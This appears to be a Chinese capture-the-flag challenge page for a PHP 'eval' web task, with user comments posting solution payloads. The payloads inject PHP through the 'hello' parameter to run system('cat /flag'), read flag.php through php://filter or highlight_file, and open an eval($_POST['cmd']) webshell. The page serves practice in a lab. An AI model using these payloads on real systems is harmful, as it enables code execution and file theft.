evalWEB 未解决

分数: 15 金币: 1
题目作者: harry
一  血: moren448
一血奖励: 1金币
解  决: 18884
提  示:
描  述:
eval
评论
qth18700737704 9天前

?hello=eval(system(%27cat%20/flag%27))

回复 1

19153693078 13天前

根据代码php文件中包含flag.php 将传值hello得结果赋值给a,输出a得值,?hello=1 输出int 1,尝试将结果换成flag.php输出string(8) "flag.php",格式还是有问题的,考虑其是php文件,尝试?hello=file("flag.php"),得到文件中内容

回复 0

auroraSEA 14天前

?hello=show_source(%27flag.php%27)

回复 0

chm 2月前

http://171.80.2.169:19841/?hello=file(%22flag.php%22)

回复 1

yiya咿呀 3月前

url/?hello=eval(system('cat /flag'))

回复 1

道法自然 3月前

蚁剑直接 url/?hello=eval($_POST['cmd')

回复 0

1nfinix 3月前

构造payload: ?hello=);highlight_file('flag.php');// 或者 ?hello=);system('cat flag.php');//

回复 0

lins11 4月前

/?hello=file_get_contents(%27php://filter/read=convert.base64-encode/resource=flag.php%27) ->base64解码

回复 0

叱咤月海鱼鱼猫 5月前

?hello=highlight_file('flag.php')

回复 1

banfang 5月前

点击场景后将代码发送给豆包等一分钟基本上就可以了

回复 0

WriteUp

image
harry

1 金币

评分(10)

解题动态

cccjfddfgyd 攻破了该题 5小时前
hsk_zy 攻破了该题 5小时前
yogalin 攻破了该题 6小时前
main123 攻破了该题 6小时前
k12g 攻破了该题 7小时前
li3427379304 攻破了该题 10小时前
呢称被我吃掉了 攻破了该题 12小时前
haduck 攻破了该题 14小时前
xiao ovo 攻破了该题 15小时前
笛安丶 攻破了该题 15小时前
进击的鱼尾 攻破了该题 1天前
1112223 攻破了该题 1天前
jjjdas 攻破了该题 1天前
nanaqilin 攻破了该题 1天前
小白RM 攻破了该题 1天前
xc8888888 攻破了该题 1天前
tschick 攻破了该题 1天前
哈哈1 攻破了该题 1天前
一骑绝尘 攻破了该题 1天前
ac_11 攻破了该题 1天前
问题反馈